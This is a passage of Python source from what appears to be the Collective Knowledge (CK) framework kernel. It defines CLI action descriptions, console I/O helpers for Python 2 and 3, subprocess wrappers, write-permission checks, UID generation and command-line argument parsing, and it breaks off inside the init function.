"copy_path_to_clipboard":{"desc":"copy current path to clipboard", "for_web": "no"},
"wiki":{"desc":"<CID> open discussion wiki page for a given entry"}, # Collective Knowledge Base (ckb)
"pwiki":{"desc":"<CID> open private discussion wiki page for a given entry"},
"help":{"desc":"<CID> print help about data (module) entry"},
"short_help":{"desc":"<CID> print short help about CK"},
"webhelp":{"desc":"<CID> open browser with online help (description) for a given CK entry"},
"webapi":{"desc":"<CID> open browser with online API for a given module"},
"guide":{"desc":"open CK wiki with user/developer guides"},
"info":{"desc":"<CID> print help about module"},
"browser":{"desc":"start CK web service and open browser"},
"add":{"desc":"<CID> add entry", "for_web":"yes"},
"update":{"desc":"<CID> update entry", "for_web":"yes"},
"load":{"desc":"<CID> load meta description of entry", "for_web": "yes"},
"edit":{"desc":"<CID> edit entry description using external editor", "for_web":"no"},
"zip":{"desc":"<CID> zip entries", "for_web":"no"},
"find":{"desc":"<CID> find path to entry"},
"cd":{"desc":"<CID> print 'cd {path to entry}'"},
"cdc":{"desc":"<CID> print 'cd {path to entry} and copy to clipboard, if supported"},
"path":{"desc":"<CID> detect CID in the current directory"},
"cid":{"desc":"<CID> get CID of the current entry"},
"rm":{"desc":"<CID> delete entry", "for_web":"yes"},
"remove":{"desc":"see 'rm'", "for_web":"yes"},
"delete":{"desc":"see 'rm'", "for_web":"yes"},
"ren":{"desc":"<CID> <new name) (data_uid) (remove_alias) rename entry", "for_web":"yes"},
"rename":{"desc":"see 'ren' function", "for_web":"yes"},
"cp":{"desc":"<CID> <CID1> copy entry", "for_web":"yes"},
"copy":{"desc":"see 'cp'", "for_web":"yes"},
"mv":{"desc":"<CID> <CID1> move entry", "for_web":"yes"},
"move":{"desc":"see 'mv'", "for_web":"yes"},
"list_files":{"desc":" list files recursively in a given entry", "for_web": "yes"},
"delete_file":{"desc":"<file> delete file from a given entry", "for_web":"yes"},
"list":{"desc":"<CID> list entries", "for_web": "yes"},
"ls":{"desc":"see 'list'", "for_web": "yes"},
"search":{"desc":"<CID> search entries", "for_web": "yes"},
"pull":{"desc":"<CID> (filename) or (empty to get the whole entry as archive) pull file from entry"},
"push":{"desc":"<CID> (filename) push file to entry"},
"add_action":{"desc":"add action (function) to existing module"},
"remove_action":{"desc":"remove action (function) from existing module"},
"list_actions":{"desc":"list actions (functions) in existing module", "for_web":"yes"},
"add_index":{"desc":"<CID> add index"},
"delete_index":{"desc":"<CID> remove index"},
"convert_cm_to_ck":{"desc":"<CID> convert old CM entries to CK entries"},
"create_entry":{"desc":"<directory> create an entry for a given directory name"},
"get_api":{"desc":"--func=<func> print API of a function in a given module"},
"download":{"desc":"<CID> attempt to download entry from remote host (experimental)", "for_web": "yes"},
"print_input":{"desc":"prints input"},
},
"actions_redirect":{"list":"list_data2",
"ls":"list_data2"},
"common_actions":["webhelp", "webapi", "help", "info", "print_input",
"wiki",
"path", "find", "cid", "cd", "cdc",
"browser",
"add",
"edit",
"load",
"zip",
"rm", "remove", "delete",
"update",
"ren", "rename",
"cp", "copy",
"mv", "move",
"ls",
"list",
"search",
"pull",
"push",
"list_files",
"delete_file",
"add_action",
"remove_action",
"list_actions",
"create_entry",
"add_index",
"delete_index",
"get_api",
"download",
"convert_cm_to_ck"]
}
work={
"env_root":"", # Path to CK installation
"dir_default_repo":"",
"dir_default_repo_path":"",
"dir_default_kernel":"",
"dir_default_cfg":"",
"dir_local_repo":"",
"dir_local_repo_path":"",
"dir_local_kernel":"",
"dir_local_cfg":"",
"local_kernel_uoa":"",
"dir_work_repo":"",
"dir_work_repo_path":"",
"dir_work_cfg":"",
"dir_repos":"",
"dir_cache_repo_uoa":"",
"dir_cache_repo_info":"",
"repo_name_work":"",
"repo_uid_work":"",
'cached_module_by_path':{},
'cached_module_by_path_last_modification':{}
}
paths_repos=[] # First path to local repo (if exist), than global
cache_repo_init=False # True, if initialized
paths_repos_all=[] # Path to all repos
cache_repo_uoa={} # Disambiguate repo UOA to repo UID
cache_repo_info={} # Cache repo info with path and type
type_long=None # In Python 3 -> int, in Python 2 -> long
string_io=None # StringIO, which is imported differently in Python 2 and 3
log_ck_entries=False # If true, log CK entries to record all dependencies
##############################################################################
# Save CK state
#
# TARGET: end users
def save_state():
"""
Input: None
Output: dict with state
"""
import copy
import os
r={}
r['cfg']=copy.deepcopy(cfg)
r['paths_repos']=copy.deepcopy(paths_repos)
r['cache_repo_init']=cache_repo_init
r['paths_repos_all']=copy.deepcopy(paths_repos_all)
r['cache_repo_uoa']=copy.deepcopy(cache_repo_uoa)
r['cache_repo_info']=copy.deepcopy(cache_repo_info)
r['os.environ']=copy.deepcopy(os.environ)
return r
##############################################################################
# Restore CK state
#
# TARGET: end users
def restore_state(r):
"""
Input: dict with state
Output: output from "init" function
"""
global initialized, cfg, paths_repos, cache_repo_init, paths_repos_all, cache_repo_uoa, cache_repo_info
import copy
import os
cfg=r['cfg']
paths_repos=r['paths_repos']
cache_repo_init=r['cache_repo_init']
paths_repos_all=r['paths_repos_all']
cache_repo_uoa=r['cache_repo_uoa']
cache_repo_info=r['cache_repo_info']
os.environ=r['os.environ']
initialized=False
return init({})
##############################################################################
# Reinitialize CK
#
# TARGET: end users
def reinit():
"""
Input: None
Output: output from "init" function
"""
global initialized, paths_repos, cache_repo_init, paths_repos_all, cache_repo_uoa, cache_repo_info
initialized=False
paths_repos=[]
cache_repo_init=False
paths_repos_all=[]
cache_repo_uoa={}
cache_repo_info={}
return init({})
##############################################################################
# Universal print of unicode string in utf8 that supports Python 2.x and 3.x
#
# TARGET: end users
def out(s):
"""
Input: s - unicode string to print
Output: Nothing
"""
if allow_print:
if con_encoding=='':
x=sys.stdin.encoding
if x==None:
b=s.encode()
else:
b=s.encode(x, 'ignore')
else:
b=s.encode(con_encoding, 'ignore')
if sys.version_info[0]>2:
try: # We encountered issues on ipython with Anaconda
# and hence made this work around
sys.stdout.buffer.write(b)
sys.stdout.buffer.write(b'\n')
except Exception as e:
print(s)
pass
else:
print(b)
sys.stdout.flush()
return None
##############################################################################
# Universal debug print of a dictionary (removing unprintable parts)
#
# TARGET: end users
def debug_out(i):
"""
Input: i - dictionary
Output: return = 0
"""
import copy
import json
ii={}
# Check main unprintable keys
for k in i:
try:
s=json.dumps(i[k])
except Exception as e:
pass
else:
ii[k]=i[k]
# Dump
out(json.dumps(ii, indent=2))
return {'return':0}
##############################################################################
# Universal print of unicode error string in utf8 that supports Python 2.x and 3.x to stderr
#
# TARGET: end users
def eout(s):
"""
Input: s - unicode string to print
Output: Nothing
"""
if allow_print:
if con_encoding=='':
x=sys.stdin.encoding
if x==None:
b=s.encode()
else:
b=s.encode(x, 'ignore')
else:
b=s.encode(con_encoding, 'ignore')
if sys.version_info[0]>2:
try: # We encountered issues on ipython with Anaconda
# and hence made this work around
sys.stderr.buffer.write(b)
sys.stderr.buffer.write(b'\n')
except Exception as e:
sys.stderr.write(s)
pass
else:
sys.stderr.write(b)
sys.stderr.flush()
return None
##############################################################################
# Universal error print and exit
#
# TARGET: end users
def err(r):
"""
Input: {
return - return code
error - error text
}
Output: Nothing; quits program
"""
import sys
rc=r['return']
re=r['error']
out('Error: '+re)
sys.exit(rc)
##############################################################################
# Universal error print for Jupyter Notebook with raise KeyboardInterrupt
#
# TARGET: end users
def jerr(r):
"""
Input: {
return - return code
error - error text
}
Output: Nothing; quits program
"""
rc=r['return']
re=r['error']
out('Error: '+re)
raise KeyboardInterrupt
##############################################################################
# Support function for safe float (useful for sorting function)
#
# TARGET: end users
def safe_float(i,d):
r=d
try:
r=float(i)
except Exception as e:
pass
return r
##############################################################################
# Support function to lower values in a list
#
# TARGET: internal
def lower_list(lst):
nlst=[]
for v in lst:
nlst.append(v.lower())
return nlst
##############################################################################
# Support function for checking splitting entry number
#
# TARGET: CK kernel and low-level developers
def get_split_dir_number(repo_dict, module_uid, module_uoa):
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
found=False
split_dir_number=0
# Check global split for all repositories (in cfg) or for a given repo
for xcfg in [cfg, repo_dict]:
x=xcfg.get('split_all_dirs','')
if x!='':
x=safe_int(x,0)
if x!=0:
found=True
split_dir_number=x
break
# Check split per module
if not found:
for xcfg in [cfg, repo_dict]:
xsplit_dirs=xcfg.get('split_dirs',{})
found=False
for m in [module_uid, module_uoa]:
x=safe_int(xsplit_dirs.get(m,0),0)
if x!=0:
split_dir_number=x
found=True
break
if found:
break
return split_dir_number
##############################################################################
# Support function for splitting entry name
#
# TARGET: CK kernel and low-level developers
def split_name(name, number):
sd1=name
sd2=''
if number!='':
number=int(number)
if number!=0:
if len(name)>number:
sd1=name[:number]
sd2=name[number:]
else:
sd1='_'
sd2=name
return (sd1,sd2)
##############################################################################
# Support function for checking whether to index data or not ...
#
# TARGET: CK kernel and low-level developers
def index_module(module_uoa, repo_uoa):
ret=True
# First check if index the whole repo
ir=cfg.get('index_repos',[])
if len(ir)>0 and repo_uoa!='':
if repo_uoa in ir:
return ret
im=cfg.get('index_modules',[])
# Next check if index module (if im is empty index all)
if len(im)>0:
ret=False
if module_uoa in im:
ret=True
return ret
##############################################################################
# Support function for safe int (useful for sorting function)
#
# TARGET: end users
def safe_int(i,d):
r=d
try:
r=int(i)
except Exception as e:
pass
return r
##############################################################################
# Support function to get value from list without error if out of bounds
# (useful for various sorting)
#
# TARGET: end users
def safe_get_val_from_list(lst, index, default_value):
v=default_value
if index<len(lst):
v=lst[index]
return v
##############################################################################
# Support function for system_with_timeout
#
# TARGET: end users
def system_with_timeout_kill(proc):
# First via psutil (works better on Windows but may not be installed)
loaded=True
try:
import psutil
except ImportError:
loaded=False
pass
if loaded: # pragma: no cover
try:
pid=proc.pid
p=psutil.Process(pid)
pc=p.get_children(recursive=True)
for px in pc:
px.kill()
p.kill()
except Exception as e:
loaded=False
pass
# Try traditional way
if not loaded:
try:
proc.terminate()
except Exception as e:
pass
return
##############################################################################
# Substituting os.system with possibility for time out
#
# TARGET: end users
def system_with_timeout(i):
"""
Input: {
cmd - command line
(timeout) - timeout in seconds (granularity 0.01 sec) - may cause overheads ...
}
Output: {
return - return code = 0, if successful
> 0, if error
= 8, if timeout
(error) - error text if return > 0
return_code - return code from app
}
"""
import subprocess
import time
cmd=i['cmd']
rc=0
to=i.get('timeout','')
p=subprocess.Popen(cmd, shell=True)
if to != '':
xto=float(to)
t0=time.time()
t=0
tx=float(i['timeout'])
while p.poll() == None and t<xto:
time.sleep(0.1)
t=time.time()-t0
if t>=xto and p.poll()==None:
system_with_timeout_kill(p)
return {'return':8, 'error':'process timed out and had been terminated'}
else:
p.wait()
rc=p.returncode
return {'return':0, 'return_code':rc}
##############################################################################
# Run command and get stdout
#
# TARGET: end users
def run_and_get_stdout(i):
"""
Input: {
cmd [list] - list of command line arguments, starting with the command itself
(shell) - if 'yes', reuse shell environment
}
Output: {
return - return code = 0, if successful
> 0, if error
= 8, if timeout
(error) - error text if return > 0
return_code - return code from app
stdout - string, standard output of the command
stderr - string, standard error of the command
}
"""
import subprocess
import shlex
import platform
cmd=i['cmd']
if type(cmd)!=list:
# Split only on non-Windows platforms (since Windows takes a string in Popen)
if not platform.system().lower().startswith('win'):
cmd=shlex.split(cmd)
xshell=False
if i.get('shell','')=='yes':
xshell=True
p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=xshell)
output, error = p1.communicate()
if sys.version_info[0]>2:
try:
output = output.decode(encoding='UTF-8')
except Exception as e:
return {'return':1, 'error':'problem encoding stdout ('+format(e)+')'}
try:
error = error.decode(encoding='UTF-8')
except Exception as e:
return {'return':1, 'error':'problem encoding stderr ('+format(e)+')'}
return {'return':0, 'return_code':p1.returncode, 'stdout':output, 'stderr':error}
##############################################################################
# Get value from one dict, remove it from there and move to another
#
# TARGET: end users
def get_from_dicts(dict1, key, default_value, dict2, extra=''):
"""
Input: dict1 - first check in this dict (and remove if there)
key - key in dict1
default_value - default value if not found
dict2 - then check from here
Output: value
"""
value=default_value
if key not in dict1:
if dict2!=None:
value=dict2.get(extra+key, default_value)
else:
value=dict1[key]
del(dict1[key])
if dict2!=None:
dict2[extra+key]=value
return value
##############################################################################
# Converting iso text time to datetime object
#
# TARGET: end users
def convert_iso_time(i):
"""
Input: {
iso_datetime - iso date time
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
(datetime_obj) - datetime object
}
"""
t=i['iso_datetime']
import datetime
import time
dto=None
ok=True
try: dto=datetime.datetime.strptime(t, "%Y-%m-%dT%H:%M:%S.%f")
except Exception as e:
ok=False
pass
if not ok:
ok=True
try: dto=datetime.datetime.strptime(t, "%Y-%m-%dT%H:%M:%S")
except Exception as e:
ok=False
pass
if not ok:
ok=True
try: dto=datetime.datetime.strptime(t, "%Y-%m-%dT%H:%M")
except Exception as e:
ok=False
pass
if not ok:
ok=True
try: dto=datetime.datetime.strptime(t, "%Y-%m-%dT%H")
except Exception as e:
ok=False
pass
if not ok:
ok=True
try: dto=datetime.datetime.strptime(t, "%Y-%m-%d")
except Exception as e:
ok=False
pass
if not ok:
ok=True
try: dto=datetime.datetime.strptime(t, "%Y-%m")
except Exception as e:
ok=False
pass
if not ok:
ok=True
try: dto=datetime.datetime.strptime(t, "%Y")
except Exception as e:
return {'return':1, 'error':'can\'t parse ISO date time: '+t}
return {'return':0, 'datetime_obj':dto}
##############################################################################
# Safe convert dict str keys to int to be sorted
#
# TARGET: end users
def convert_str_key_to_int(key):
try:
return int(key)
except ValueError:
return 0
##############################################################################
# Universal input of unicode string in utf8 that supports Python 2.x and 3.x
#
# TARGET: end users
def inp(i):
"""
Input: {
text - text to print
}
Output: {
return - return code = 0
string - input string
}
"""
t=i['text']
if con_encoding=='':
x=sys.stdin.encoding
if x==None:
b=t.encode()
else:
b=t.encode(x, 'ignore')
else:
b=t.encode(con_encoding, 'ignore') # pragma: no cover
if sys.version_info[0]>2:
try: b=b.decode(sys.stdin.encoding)
except Exception as e:
try: b=b.decode('utf8')
except Exception as e: pass
if sys.version_info[0]>2:
s=input(b)
else:
x=sys.stdin.encoding
if x==None:
x='utf8'
s=raw_input(b).decode(x).encode('utf8')
return {'return':0, 'string':s}
##############################################################################
# Universal selector of dictionary entry
#
# TARGET: end users (advanced version available in module "choice")
def select(i):
"""
Input: {
dict - dict with values being dicts with 'name' as string to display and 'sort' as int (for ordering)
(title) - print title
(error_if_empty) - if 'yes' and Enter, make error
(skip_sort) - if 'yes', do not sort array
}
Output: {
return - return code = 0
string - selected dictionary key
}
"""
s=''
title=i.get('title','')
if title!='':
out(title)
out('')
d=i['dict']
if i.get('skip_sort','')!='yes':
kd=sorted(d, key=lambda v: d[v].get('sort',0))
else:
kd=d
j=0
ks={}
for k in kd:
q=d[k]
sj=str(j)
ks[sj]=k
qn=q.get('name','')
out(sj+') '+qn)
j+=1
out('')
rx=inp({'text':'Make your selection (or press Enter for 0): '})
if rx['return']>0: return rx
sx=rx['string'].strip()
if sx=='':
if i.get('error_if_empty','')=='yes':
return {'return':1, 'error':'selection is empty'}
s=kd[0]
else:
if sx not in ks:
return {'return':1, 'error':'selection is not recognized'}
s=ks[sx]
return {'return':0, 'string':s}
##############################################################################
# Universal UOA selector
#
# TARGET: end users (advanced version available in module "choice")
def select_uoa(i):
"""
Input: {
choices - list from search function
(skip_enter) - if 'yes', do not select 0 when user presses Enter
(skip_sort) - if 'yes', do not sort array
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
choice - data UOA
}
"""
se=i.get('skip_enter','')
lst=i.get('choices',[])
if i.get('skip_sort','')!='yes':
klst=sorted(lst, key=lambda v: v['data_uoa'])
else:
klst=lst
zz={}
iz=0
for z1 in klst:
z=z1['data_uid']
zu=z1['data_uoa']
zs=str(iz)
zz[zs]=z
out(zs+') '+zu+' ('+z+')')
iz+=1
out('')
y='Select UOA'
if se!='yes': y+=' (or press Enter for 0)'
y+=': '
rx=inp({'text':y})
x=rx['string'].strip()
if x=='' and se!='yes': x='0'
if x not in zz:
return {'return':1, 'error':'number is not recognized'}
dduoa=zz[x]
return {'return':0, 'choice':dduoa}
##############################################################################
# Convert string to list
#
# TARGET: end users
def convert_str_tags_to_list(i):
"""
Input: either a list, or a string of comma-separated tags.
Output: If i is a list, it's returned.
If i is a string, the list of tags it represents is returned
(each tag is stripped of leading and trailing whitespace).
"""
r=[]
if type(i)==list:
r=i
else:
ii=i.split(',')
for q in ii:
q=q.strip()
if q!='':
r.append(q)
return r
##############################################################################
# Check writing possibility
#
# TARGET: CK kernel and low-level developers
def check_writing(i):
"""
Input: {
(module_uoa)
(module_uid)
(repo_uoa)
(repo_uid)
(repo_dict)
(delete) - if 'yes', check if global delete operation is allowed
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
(repo_dict) - repo cfg if available
}
"""
dl=i.get('delete','')
if dl=='yes' and cfg.get('forbid_global_delete','')=='yes':
return {'return':1, 'error':'delete/rename operations are forbidden'}
if cfg.get('forbid_global_writing','')=='yes':
return {'return':1, 'error':'global writing is forbidden'}
if len(i)==0:
return {'return':0} # Check only global writing
if cfg.get('forbid_writing_modules','')=='yes':
muoa=i.get('module_uoa','')
muid=i.get('module_uid','')
if muoa==cfg['module_name'] or (muid!='' and muid in cfg['module_uids']):
return {'return':1, 'error':'writing/changing modules is forbidden'}
ruoa=i.get('repo_uoa','')
ruid=i.get('repo_uid','')
if cfg.get('forbid_writing_to_default_repo','')=='yes':
if ruoa==cfg['repo_name_default'] or ruid==cfg['repo_uid_default']:
return {'return':1, 'error':'writing to default repo is forbidden'}
if cfg.get('forbid_writing_to_local_repo','')=='yes':
if ruoa==cfg['repo_name_local'] or ruid==cfg['repo_uid_local']:
return {'return':1, 'error':'writing to local repo is forbidden'}
rr={'return':0}
# Load info about repo
rd={}
if ruoa!='':
if 'repo_dict' in i:
rd=i['repo_dict']
else:
rx=load_repo_info_from_cache({'repo_uoa':ruoa})
if rx['return']>0: return rx
rd=rx.get('dict',{})
rr['repo_dict']=rd
if cfg.get('allow_writing_only_to_allowed','')=='yes':
if rd.get('allow_writing','')!='yes':
return {'return':1, 'error':'writing to this repo is forbidden'}
if rd.get('forbid_deleting','')=='yes' and dl=='yes':
return {'return':1, 'error':'deleting in this repo is forbidden'}
return rr
##############################################################################
# Get CK version
#
# TARGET: end users
def get_version(i):
"""
Input: {}
Output: {
return - return code = 0
version - list starting from major version number
version_str - version string
}
"""
import copy
s=''
x=copy.deepcopy(cfg['version'])
for q in x:
if s!='': s+='.'
s+=str(q)
return {'return':0, 'version':x, 'version_str':s}
##############################################################################
# Generate temporary files
#
# TARGET: end users
def gen_tmp_file(i):
"""
Input: {
(suffix) - temp file suffix
(prefix) - temp file prefix
(remove_dir) - if 'yes', remove dir
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
file_name - temp file name
}
"""
xs=i.get('suffix','')
xp=i.get('prefix','')
s=i.get('string','')
import tempfile
fd, fn=tempfile.mkstemp(suffix=xs, prefix=xp)
os.close(fd)
os.remove(fn)
if i.get('remove_dir','')=='yes':
fn=os.path.basename(fn)
return {'return':0, 'file_name':fn}
##############################################################################
# Get host platform (currently win or linux) and OS bits
#
# TARGET: end users
def get_os_ck(i):
"""
Input: {
(bits) - force OS bits
}
Output: {
return - return code = 0
platform - 'win' or 'linux'
bits - OS bits in string: 32 or 64
python_bits - Python installation bits in string: 32 or 64
}
"""
import os
import platform
import struct
pbits=str(8 * struct.calcsize("P"))
plat='linux'
if platform.system().lower().startswith('win'): # pragma: no cover
plat='win'
obits=i.get('bits','')
if obits=='':
obits='32'
if plat=='win':
# Trying to get fast way to detect bits
if os.environ.get('ProgramW6432','')!='' or os.environ.get('ProgramFiles(x86)','')!='': # pragma: no cover
obits='64'
else:
# On Linux use first getconf LONG_BIT and if doesn't work use python bits
obits=pbits
r=gen_tmp_file({})
if r['return']>0: return r
fn=r['file_name']
cmd='getconf LONG_BIT > '+fn
rx=os.system(cmd)
if rx==0:
r=load_text_file({'text_file':fn,
'delete_after_read':'yes'})
if r['return']==0:
s=r['string'].strip()
if len(s)>0 and len(s)<4:
obits=s
return {'return':0, 'platform':plat, 'bits':obits, 'python_bits':pbits}
##############################################################################
# Generate CK UID
#
# TARGET: end users
def gen_uid(i):
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
data_uid - UID in string format (16 characters 0..9,a..f)
}
"""
import uuid
import random
uid=str(uuid.uuid4().hex)
if len(uid)!=32:
return {'return':1, 'error':'problem generating UID : len='+str(len(uid))+' !=32'} # pragma: no cover
random.seed
x=random.randrange(0,16)
return {'return':0, 'data_uid':uid[x:x+16]}
##############################################################################
# Check if string is CK UID
#
# TARGET: end users
def is_uid(str):
"""
Input: string to check
Output: True if UID, otherwise False
"""
import re
if len(str)!=16:
return False
pattern = r'[^\.a-f0-9]'
if re.search(pattern, str.lower()):
return False
return True
##############################################################################
# Check if string is correct CK UOA
# (i.e. does not have special characters including *, ?)
#
# TARGET: end users
def is_uoa(str):
"""
Input: string to check
Output: True if allowed UOA, False otherwise
"""
if str.find(cfg['detect_cur_cid'])>=0 or str.find(cfg['detect_cur_cid1'])>=0: return False
if str.find('*')>=0: return False
if str.find('?')>=0: return False
return True
##############################################################################
# Prepare special info about entry (engine used, author, date, etc)
#
# TARGET: CK kernel and low-level developers
def prepare_special_info_about_entry(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - dict with info
}
"""
# Add control info
d={'engine':'CK',
'version':cfg['version']}
if cfg.get('default_developer','')!='':
d['author']=cfg['default_developer']
if cfg.get('default_developer_email','')!='':
d['author_email']=cfg['default_developer_email']
if cfg.get('default_developer_webpage','')!='':
d['author_webpage']=cfg['default_developer_webpage']
if cfg.get('default_license','')!='':
d['license']=cfg['default_license']
if cfg.get('default_copyright','')!='':
d['copyright']=cfg['default_copyright']
r=get_current_date_time({})
d['iso_datetime']=r['iso_datetime']
return {'return':0, 'dict': d}
##############################################################################
def load_json_file(i):
import ck.files
return ck.files.load_json_file(i)
##############################################################################
def save_json_to_file(i):
import ck.files
return ck.files.save_json_to_file(i)
##############################################################################
def load_yaml_file(i):
import ck.files
return ck.files.load_yaml_file(i)
##############################################################################
def save_yaml_to_file(i):
import ck.files
return ck.files.save_yaml_to_file(i)
##############################################################################
def load_text_file(i):
import ck.files
return ck.files.load_text_file(i)
##############################################################################
def save_text_file(i):
import ck.files
return ck.files.save_text_file(i)
##############################################################################
# Substitute string in file
#
# TARGET: end users
def substitute_str_in_file(i):
"""
Input: {
filename - file
string1 - string to be replaced
string2 - replace string
}
Output: {
return - return code = 0, if successful
= 16, if file not found
> 0, if error
(error) - error text if return > 0
}
"""
fn=i['filename']
s1=i['string1']
s2=i['string2']
# Load text file (unicode)
r=load_text_file({'text_file':fn})
if r['return']>0: return r
# Replace
x=r['string']
x=x.replace(s1,s2)
# Save text file (unicode)
r=save_text_file({'text_file':fn, 'string':x})
if r['return']>0: return r
return {'return':0}
##############################################################################
# Deprecated
def dumps_json(i):
import ck.strings
return ck.strings.dump_json(i)
##############################################################################
def dump_json(i):
import ck.strings
return ck.strings.dump_json(i)
##############################################################################
def copy_to_clipboard(i): # pragma: no cover
import ck.strings
return ck.strings.copy_to_clipboard(i)
##############################################################################
def convert_json_str_to_dict(i):
import ck.strings
return ck.strings.convert_json_str_to_dict(i)
##############################################################################
# Merge intelligently dict1 with dict2 key by key in contrast with dict1.update(dict2)
#
# TARGET: end users
def merge_dicts(i):
"""
Input: {
dict1 - merge this dict with dict2 (will be directly modified!)
dict2 - dict
Output: {
return - return code = 0, if successful
dict1 - output dict
}
"""
a=i['dict1']
b=i['dict2']
for k in b:
v=b[k]
if type(v) is dict:
if k not in a:
a.update({k:b[k]})
elif type(a[k])==dict:
merge_dicts({'dict1':a[k], 'dict2':b[k]})
else:
a[k]=b[k]
elif type(v) is list:
a[k]=[]
for y in v:
a[k].append(y)
else:
a[k]=b[k]
return {'return':0, 'dict1':a}
##############################################################################
# Convert file to upload string
#
# TARGET: end users
def convert_file_to_upload_string(i):
"""
Input: {
filename - file name to convert
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
file_content_base64 - string that can be transmitted through Internet
}
"""
import base64
fn=i['filename']
if not os.path.isfile(fn):
return {'return':1, 'error':'file '+fn+' not found'}
s=b''
try:
f=open(fn, 'rb')
while True:
x = f.read(32768);
if not x: break
s+=x
f.close()
except Exception as e:
return {'return':1, 'error':'error reading file ('+format(e)+')'}
s=base64.urlsafe_b64encode(s).decode('utf8')
return {'return':0, 'file_content_base64': s}
##############################################################################
# Convert upload string to file
#
# TARGET: end users
def convert_upload_string_to_file(i):
"""
Input: {
file_content_base64 - string transmitted through Internet
(filename) - file name to write (if empty, generate tmp file)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
filename - filename with full path
filename_ext - filename extension
}
"""
import base64
x=i['file_content_base64']
fc=base64.urlsafe_b64decode(str(x)) # convert from unicode to str since base64 works on strings
# should be safe in Python 2.x and 3.x
fn=i.get('filename','')
if fn=='':
rx=gen_tmp_file({'prefix':'tmp-'})
if rx['return']>0: return rx
px=rx['file_name']
else:
px=fn
fn1, fne = os.path.splitext(px)
if os.path.isfile(px):
return {'return':1, 'error':'file already exists in the current directory'}
try:
fx=open(px, 'wb')
fx.write(fc)
fx.close()
except Exception as e:
return {'return':1, 'error':'problem writing file='+px+' ('+format(e)+')'}
return {'return':0, 'filename':px, 'filename_ext': fne}
##############################################################################
# Input JSON from console (double enter to finish)
#
# TARGET: end users
def input_json(i):
"""
Input: {
text - text to print
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
string
dict - parsed JSON
}
"""
t=i['text']
out(t)
s=''
while True:
r=inp({'text':''})
if r['return']>0: return r
ss=r['string'].strip()
if ss=='': break
s+=ss
s=s.strip()
if s=='': s='{}' # empty json
else:
if not s.startswith('{'): s='{'+s
if not s.endswith('}'): s+='}'
r=convert_json_str_to_dict({'str':s, 'skip_quote_replacement':'yes'})
if r['return']>0: return r
d=r['dict']
return {'return':0, 'string': s, 'dict':d}
##############################################################################
# Convert CK list to CK dict with unicode in UTF-8 (unification of interfaces)
#
# TARGET: CK kernel and low-level developers
def convert_ck_list_to_dict(i):
"""
Input: [
CK list: see 'action' function from this kernel
]
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
ck_dict - {
"action":action
"cid":module_uoa or CID (x means that it may not be really CID
and has to be processed specially
"cids":[cid1, cid2, cid3, ...]
"key1":value1
"key2":value2
...
"key10":""
"key11":value11
keys/values from file_json; if file extension is .tmp,
it will be deleted after read!
keys/values from cmd_json
"unparsed":unparsed_cmd
}
"""
obj={}
obj['cids']=[]
l=len(i)
if l>0: obj['action']=i[0]
module_uoa_or_cid=''
# Parsing
cx=True # Start first processing CIDs and then turn it off when something else is encountered
if l>1:
for x in range(1, len(i)):
p=i[x].rstrip()
#####################################
if p=='--':
cx=False
p2=i[x+1:]
obj['unparsed']=p2
break
#####################################
elif p.startswith('--'):
cx=False
p=p[2:]
p1=p
p2='yes'
q=p.find("=")
if q>0:
p1=p[0:q]
if len(p)>q:
p2=p[q+1:]
obj[p1]=p2
#####################################
elif p.startswith('-'):
cx=False
p=p[1:]
p1=p
p2='yes'
q=p.find("=")
if q>0:
p1=p[0:q]
if len(p)>q:
p2=p[q+1:]
obj[p1]=p2
#####################################
elif p.startswith("@@@"):
cx=False
jd=p[3:]
if len(jd)<3:
return {'return':1, 'error':'can\'t parse command line option '+p}
y=convert_json_str_to_dict({'str':jd})
if y['return']>0: return y
merge_dicts({'dict1':obj, 'dict2':y['dict']})
#####################################
elif p.startswith("@@"):
cx=False
key=p[2:]
x='Add JSON to input'
if key!='': x+=' for key "'+key+'"'
x+=' (double Enter to stop):\n'
rx=input_json({'text':x})
if rx['return']>0: return rx
dy=rx['dict']
dx=obj
if key!='':
if key not in obj: obj[key]={}
dx=obj[key]
merge_dicts({'dict1':dx, 'dict2':dy})
#####################################
elif p.startswith("@"):
cx=False
name=p[1:]
if len(name)<2:
return {'return':1, 'error':'can\'t parse command line option '+p}
y=load_json_file({'json_file':name})
if y['return']>0: return y
if name.endswith('.tmp'):
os.remove(name)
merge_dicts({'dict1':obj, 'dict2':y['dict']})
#####################################
elif p.find('=')>=0:
cx=False
p1=p
p2=''
q=p.find("=")
if q>0:
p1=p[0:q]
if len(p)>q:
p2=p[q+1:]
obj[p1]=p2
#####################################
else:
# If no module_uoa_or_cid -> set it
if module_uoa_or_cid=='':
module_uoa_or_cid=p
else:
# Otherwise add to CIDs
obj['cids'].append(p)
if module_uoa_or_cid!='': obj['cid']=module_uoa_or_cid
return {'return':0, 'ck_dict':obj}
##############################################################################
# Init CK (current instance - has state!)
#
# TARGET: internal use
def init(i): # pragma: no cover
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
global cfg, work, initialized, paths_repos, type_long, string_io, log_ck_entries
if initialized:
return {'return':0}
# Add this path to syspath to be able to call other modules
this_kernel_dir = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.insert(0, this_kernel_dir)
# Split version
cfg['version']=__version__.split('.')
# Default URL. FIXME: should be formed from wfe_host and wfe_port when they are known.
# cfg['wfe_url_prefix'] = 'http://%s:%s/web?' % (cfg['default_host'], cfg['default_port'])
# Check long/int types
try:
x=long
except Exception as e:
type_long=int
else:
type_long=long
# Import StringIO
if sys.version_info[0]>2:
import io
string_io=io.StringIO
else:
from StringIO import StringIO
string_io=StringIO
# Check where are repos (to keep compatibility with past CK < V1.5)
p=''
searched_places=[]
import inspect
